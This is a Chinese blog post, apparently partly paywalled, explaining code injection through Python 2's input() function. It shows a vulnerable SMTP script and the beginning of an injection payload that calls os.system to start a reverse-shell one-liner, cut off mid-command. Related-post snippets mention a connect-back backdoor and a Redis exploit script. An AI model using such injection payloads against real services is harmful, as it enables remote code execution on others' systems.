Python输入漏洞利用(Python input漏洞)

已于 2022-08-31 10:51:22 修改
阅读量902 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 渗透常识研究 文章标签: python 开发语言
于 2022-08-31 10:45:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u012206617/article/details/126619255
本文探讨了Python中input函数导致的安全漏洞,介绍了背景条件,包括程序使用input或raw_input函数来获取用户输入。示例代码展示了一段易受攻击的SMTP邮件发送脚本,其中用户输入未经验证直接用于发送邮件。文章还提到了Payload示例,如利用漏洞获取反弹shell,并阐述了如何构造这样的攻击payload。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

背景条件

  1. 源码为python编写的程序
  2. 该程序包含input函数,利用用户或自动化输入获取参数进行下一步

漏洞函数

  • input():接收用户输入且不修改输入的类型
  • raw_input():接收用户输入并强制修改为字符串类型

漏洞源码示例

#!/usr/bin/python3
#-*- coding: utf-8 -*-
 
import smtplib
 
address = '[email protected]'
data = str(input('report: '))
print('[+] sending the message: ' + str(data))
 
try:
    server = smtplib.SMTP("beerpwn.it", None, None)
    server.sendmail("local@bottleneck", address, str(data))
    server.close()
except Exception as e:
    pass

Payload

../etc/passwd' and __import__("os").system("rm /tmp/f;mkf

了解本专栏 订阅专栏 解锁全文
Python Flask的安全漏洞防范
Python编程之道的博客
04-03 1113
随着Web应用的广泛发展,Python Flask作为一个轻量级的Web框架,因其简洁易用、灵活高效的特点,被众多开发者所青睐。然而,由于Web应用面临着各种安全威胁,Flask应用也不例外。本文章的目的是深入探讨Python Flask应用中可能存在的安全漏洞,并提供相应的防范措施。范围涵盖了常见的安全漏洞类型,如SQL注入、XSS、CSRF等,以及针对这些漏洞的具体防范方法和代码示例。本文首先对Python Flask框架进行简要介绍,然后详细分析常见的安全漏洞类型及其原理和危害。
Input XSS最新漏洞利用
06-12
我们知道,如果要使XSS能够实现,我们的代码必须通过某种方式嵌入到对方的网页中。像注入漏洞的“’”、“and 1=1”和“and 1=2”一样,Input XSS也有自己的漏洞检测字符串,它们就是“<>”、“<iframe>”和 “<script>alert(/xss/)</script>”。如果当你在Input框中输入“<>”,并在新 页面的源代码中找到这对标签的话,那么基本上就说明它存在Input XSS漏洞;而“<iframe>”则是它的可视化检测方式;如果“<script>alert(/xss/)< /script>”能够实现,则证明该页面可以实行脚本攻击,但是否可以被插入脚本,在本次的测试里亦不是非常重要,后面你将会知道。
Python中的10个常见安全漏洞及修复方法
gaojian5422的博客
02-28 2568
Python中的10个常见安全漏洞及修复方法
Python登录漏洞复现
zhuge_long的专栏
05-31 865
3)安装requests网络请求库。2)安装ddddocr图形识别库。
python2中input()漏洞
Pz_mstr's Blog
04-09 1027
前言 Python2中有两种接收用户输入的方法 input():接收用户输入且不修改输入的类型 raw_input():接收用户输入并强制修改为字符串类型 input()漏洞 input()原样接收用户输入会导致严重的代码注入漏洞,下面请看例子: 例子1 passwd = "my123passwd" temp = input("Enter passwd:") if temp == passwd: print("Succees.") else: print("Sorry") 例子2 input = i
python shell怎么换行_我非我同学的python的反弹shell的代码 | 学步园
weixin_39880666的博客
11-25 113
不知道怎么忽然想看这个,呵呵小我的python的反shell的代码#!/usr/bin/python# Python Connect-back Backdoor# Author: wofeiwo # Version: 1.0# Date: July 15th 2006import sysimport osimport socketshell = "/bin/sh"def usage(program...
使用Python脚本实现Web漏洞扫描
07-19
### 使用Python脚本实现Web漏洞扫描的关键知识点 #### 一、背景介绍 随着互联网技术的飞速发展,网络安全成为了一个不容忽视的问题。Web应用程序作为互联网服务的重要组成部分,其安全性直接影响到用户的数据安全和...
Python网站漏洞自动检测
2407_86170733的博客
08-12 582
print(f"可能存在 XSS 漏洞: {url + action}")print(f"可能存在 SQL 注入漏洞: {test_url}")print(f"可能存在 CSRF 漏洞: {url}")
python脚本实现Redis未授权访问漏洞利用
最新发布
qq_60256199的博客
10-07 1704
python脚本实现Redis未授权访问漏洞利用
Python2中input()函数漏洞
SkYe's Blog
09-13 1727
函数简介 input()函数是python中的内置函数,函数作用是从stdin中读取数据 input() 与 raw_input() 区别 python2 两个常见输入函数:input 和 raw_input 。 raw_input() 会将输入的内容转换为字符串: #!/usr/bin/env python # -*- coding: utf-8 -*- a1 = raw_input("字符串:") print type(a1) a2 = raw_input("数字:") print type(a2)
python S2-45 漏洞利用工具
weixin_34246551的博客
03-11 148
初学python脚本,写个工具练练手。第一次写勿喷。呃...忘了截图了,补上了。 程序对于处理 JSON post 有些问题,其他地方还没发现有啥问题。 #coding:utf-8 import chardet import urllib2 import httplib from Tkinter import * from poster.encode imp...
python直接执行代码漏洞_利用本地包含漏洞执行任意代码
weixin_39935571的博客
12-11 275
1概述文件包含(LocalFileInclude)是php脚本的一大特色,程序员们为了开发的方便,常常会用到包含。比如把一系列功能函数都写进fuction.php中,之后当某个文件需要调用的时候就直接在文件头中写上一句就可以调用内部定义的函数。本地包含漏洞是PHP中一种典型的高危漏洞。由于程序员未对用户可控的变量进行输入检查,导致用户可以控制被包含的文件,成功利用时可以使webserver会将...
python怎么执行代码漏洞_在漏洞利用Python代码真的很爽
weixin_39870155的博客
12-08 122
漏洞利用Python代码真的很爽更新时间:2007年08月26日 21:57:56 作者:不知道怎么忽然想看这个,呵呵小我的python的反shell的代码#!/usr/bin/python#PythonConnect-backBackdoor#Author:wofeiwo#Version:1.0#Date:July15th2006importsysimporto...
python2 input漏洞_Python 中的 10 个常见安全漏洞,以及如何避免
weixin_39827589的博客
12-08 470
简评:编写安全代码很困难,当你学习一个编程语言、模块或框架时,你会学习其使用方法。 在考虑安全性时,你需要考虑如何避免被滥用,Python 也不例外,即使在标准库中,也存在用于编写应用的不良实践。然而,许多 Python 开发人员却根本不知道它们。1. 输入注入(Input injection)注入攻击非常广泛而且很常见,注入有很多种类,它们影响所有的语言、框架和环境。SQL 注入是直接编写 SQ...
Python学习漏洞
Tony10010的博客
02-26 309
今天去面试两家公司,且不说结果如何,谈谈今天发现的知识的漏洞。 2个字典怎么取并集? emmm当时回答的比较水,没想到别的方法,然后就说了一个极其笨的方法。 for循环balabala。。。 脑子里这么想的。。 dict1 = {'a': 2, 'c': 3} dict2 = {'a': 3, 'd': 4} union_dict = {} for key in dict1: unio...
python漏洞利用脚本_Redis 未授权访问漏洞(附Python脚本)
weixin_39590635的博客
12-18 613
0x01 环境搭建#下载并安装cd/tmpwget http://download.redis.io/releases/redis-2.8.17.tar.gztar xzf redis-2.8.17.tar.gzcd redis-2.8.17make#启动redis服务cd src./redis-server启动redis服务进程后,就可以使用测试客户端程序redis-cli和redis服务交互了...
python open 函数漏洞_input()函数中的Python漏洞
weixin_28943045的博客
03-01 279
在本文中,我们将学习在版本2.x中输入函数如何以不良方式运行。或更早。在2.x版中。raw_input()函数可替换该input()函数。在较新的版本3.x中。或稍后,将两个功能的所有所需特征和功能合并到该input()方法中。首先,让我们看一下在Python 2.x中接受输入的内置函数的输入类型。示例#InputGiven:Stringstr1=raw_input("Outputo...
python raw input_Python2 中 input() 和raw_input()
weixin_39604598的博客
12-02 386
Python2 中如要想要获得用户从命令行的输入,可以使用 input() 和 raw_input() 两个函数,那么这两者有什么区别呢?我们先借助 help 函数来看下两者的文档注释:>>> help(raw_input)Help on built-in function raw_input in module __builtin__:raw_input(...)raw_i...
python代码执行漏洞_在漏洞利用Python代码真的很爽
weixin_39949894的博客
01-11 361
不知道怎么忽然想看这个,呵呵小我的python的反shell的代码#!/usr/bin/python#PythonConnect-backBackdoor#Author:wofeiwo#Version:1.0#Date:July15th2006importsysimportosimportsocketshell="/bin/sh"defusage(program...
利用Python检查DNS服务器的AXFR配置漏洞工具
本工具可以接受用户输入文件( INPUTFILE),其中包含待检查的域名列表,并可选择性地将测试结果输出到指定的文件( OUTPUTFILE)和日志文件( LOGFILE)。另外,还支持多进程并行测试以提高效率,进程数由 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

墨痕诉清风

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值